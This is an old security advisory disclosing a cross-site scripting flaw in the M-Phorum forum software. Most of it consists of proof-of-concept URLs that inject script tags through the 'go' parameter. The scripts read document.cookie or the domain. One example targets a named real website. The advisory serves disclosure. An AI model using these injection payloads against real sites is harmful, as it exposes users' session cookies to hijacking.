M-Phorum Cross Site Scripting

2006-03-09T00:00:00
ID SECURITYVULNS:DOC:11750
Type securityvulns
Reporter Securityvulns
Modified 2006-03-09T00:00:00

Description


M-Phorum Cross Site Scripting

Site:http://m-phorum.sourceforge.net/site/

Credit : CodeXpLoder'tq webpage:www.biyosecurity.com Mail :codexploder@linuxmail.org


M-Phorum

http://victim/path/index.php?go="><script>alert(document.cookie)</script> http://victim/path/index.php?go="><script>alert(/Codexploder'tq/)</script> http://victim/path/index.php?go="><script>alert(document.domain)</script>

http://victim/path/?go="><script>alert(document.cookie)</script> http://victim/path/?go="><script>alert(/BiyoSecurityTeam/)</script> http://victim/path/?go="><script>alert(document.domain)</script>


Example:

http://www.depijpsite.nl/forum2/index.php?go="><script>alert(/Codexploder'tq/)</script>

Source:

http://www.blogcu.com/Liz0ziM/338295

http://biyosecurity.be/bugs/mphorum.txt


Sohbet ve eglence, web kamera ve sesli sohbet Messenger'de. http://messenger.msn.com/?mkt=tr&DI=3490&XAPID=2584